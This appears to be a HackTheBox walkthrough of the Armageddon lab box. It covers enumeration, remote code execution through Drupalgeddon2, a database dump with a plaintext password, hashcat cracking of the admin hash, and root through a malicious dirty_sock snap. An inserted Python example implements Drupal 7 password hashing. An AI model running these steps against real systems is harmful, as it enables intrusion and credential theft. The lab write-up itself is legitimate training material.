HackTheBox Armageddon Writeup
Enjoy reading my HTB Armageddon Writeup
Information Gathering
Let's start with gaining some information about the HTB Armageddon machine using nmap:
sudo nmap -p 1-5000 -sV -sC -v 10.10.10.233
This shows that an SSH service is running on port 22 and an Apache httpd 2.4.6 (CentOS) service on port 80.
Next, I used gobuster for directory enumeration:
gobuster dir -u http://10.10.10.233/ -w Lists/gobuster/directory.txt
That revealed the following ones:
/scripts (Status: 301) [Size: 236] [--> http://10.10.10.233/scripts/]
/sites (Status: 301) [Size: 234] [--> http://10.10.10.233/sites/]
/includes (Status: 301) [Size: 237] [--> http://10.10.10.233/includes/]
/profiles (Status: 301) [Size: 237] [--> http://10.10.10.233/profiles/]
/themes (Status: 301) [Size: 235] [--> http://10.10.10.233/themes/]
/misc (Status: 301) [Size: 233] [--> http://10.10.10.233/misc/]
/modules (Status: 301) [Size: 236] [--> http://10.10.10.233/modules/]
I enumerated the various files but couldn't extract anything useful or sensitive. After some further checking, I recognized a file called "drupal.js", which belongs to Drupal, a web content management framework.
Some more research turned up several exploits for different Drupal versions; "drupalgeddon2", based on CVE-2018-7600 and allowing remote code execution, looked the most promising.
Exploiting Drupal
First, I spent around an hour with this script trying to get a reverse shell via PHP or bash, but didn't have any success.
Then I decided to archive the current working directory and download it to my local machine for further investigation:
python drupalgeddon2.py -h http://10.10.10.233 -c 'tar -czvf /var/www/html/archive.tar.gz /var/www/html'
After some more time, I eventually found the file settings.php in /var/www/html/sites/default which contained a database username and password.
Many tries later I gave up on gaining a reverse shell manually, fired up the Metasploit Framework and selected exploit/unix/webapp/drupal_drupalgeddon2.
This time I was able to gain a meterpreter session on the third try and spawned a shell using shell.
Accessing the Database
With mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;' I listed all the databases (and yes, there is no space between the -p flag and the password itself):
mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'
Database
information_schema
drupal
mysql
performance_schema
Then it was time to get all the tables:
mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;'
Tables_in_drupal
actions
[...]
url_alias
users
users_roles
variable
watchdog
Finally, let's get the content of the user table:
mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select * from users;'
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
I had never seen a hash starting with $S$ before, so I had to look it up first and learned that it is Drupal's password hashing algorithm, called Drupal7 (hashcat mode 7900).
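To make sense of that format, here is an added Python example (not code from the writeup) that parses the $S$ setting string, reports the work factor it encodes, and recomputes Drupal 7's iterated SHA-512 scheme, i.e. what hashcat mode 7900 calculates. The password and salt used for the self-check are constructed values, not anything from the box.

```python
import hashlib
import hmac

# Drupal 7 "$S$" layout: "$S$" + cost char + 8-char salt + custom base64 of an iterated
# SHA-512, the whole string truncated to 55 chars. Added example, not the writeup's code.
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_LENGTH = 55

def encode64(data: bytes) -> str:
    """phpass-style base64: 3 bytes read little-endian into 4 six-bit chars, no padding."""
    out = []
    for k in range(0, len(data), 3):
        chunk = data[k:k + 3]
        value = int.from_bytes(chunk, 'little')
        for j in range(len(chunk) + 1):  # a 1- or 2-byte tail yields 2 or 3 chars
            out.append(ITOA64[(value >> (6 * j)) & 0x3F])
    return ''.join(out)

def parse_setting(stored: str):
    """Return (count_log2, salt) from the 12-char setting prefix, or None if malformed."""
    if len(stored) < 12 or stored[:3] != '$S$':
        return None
    count_log2 = ITOA64.find(stored[3])
    if not 7 <= count_log2 <= 30:  # Drupal rejects cost values outside this range
        return None
    return count_log2, stored[4:12]

def iterations(stored: str) -> int:
    """Work factor encoded in the cost character: 2**count_log2 SHA-512 rounds."""
    parsed = parse_setting(stored)
    return 0 if parsed is None else 1 << parsed[0]

def drupal7_hash(password: str, salt: str, count_log2: int = 15) -> str:
    """Compute a $S$ hash; 15 is Drupal 7's default cost (32768 rounds)."""
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return ('$S$' + ITOA64[count_log2] + salt + encode64(digest))[:HASH_LENGTH]

def drupal7_verify(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored $S$ hash."""
    parsed = parse_setting(stored)
    if parsed is None or len(stored) != HASH_LENGTH:
        return False
    count_log2, salt = parsed
    return hmac.compare_digest(drupal7_hash(password, salt, count_log2), stored)
```

The cost character "D" in the hash above means 2^15 = 32768 SHA-512 rounds per guess, which is why cracking such hashes is GPU work rather than something to run on a laptop VM.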
Because my pentesting VM does not have the GPU power of my host machine I copied the hash to it and ran hashcat there:
hashcat -a 0 -m 7900 hash.txt rockyou.txt
and
hashcat -a 0 -m 7900 hash.txt rockyou.txt --show
During my enumeration earlier I also took a look at the /etc/passwd file and saw that there is a user called "brucetherealadmin" who also appears in the database.
Gaining the user flag and root privileges
To gain the user flag I connected to the server via SSH using the password we just cracked.
Now you are able to obtain the user flag.
In order to escalate our privileges I first checked sudo -l:
[brucetherealadmin@armageddon home]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
 !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
 LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
 LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
 XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
 (root) NOPASSWD: /usr/bin/snap install *
After some more research on GitHub and GTFOBins I found "dirty_sock" (do yourself a favor and add "GitHub" to your search query).
I copied the TROJAN_SNAP payload from that script
and used echo <PAYLOAD> | base64 -d > privesc.snap to create a snap file.
Using sudo snap install --devmode privesc.snap we can install dirty-sock and switch to the freshly created user with su dirty_sock (password: dirty_sock).
From there we can escalate our privileges to root with sudo /bin/bash and finally obtain the system flag in the root directory.
[brucetherealadmin@armageddon ~]$ sudo snap install --devmode exp.snap
dirty-sock 0.1 installed
[brucetherealadmin@armageddon ~]$ su dirty_sock
Password:
[dirty_sock@armageddon brucetherealadmin]$ sudo /bin/bash

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

 #1) Respect the privacy of others.
 #2) Think before you type.
 #3) With great power comes great responsibility.

[sudo] password for dirty_sock:
[root@armageddon brucetherealadmin]# cat /root/root.txt
88007da3dadc638aa75cd3c363165e12
Tags:
armageddon, htb, hackthebox, walkthrough, writeup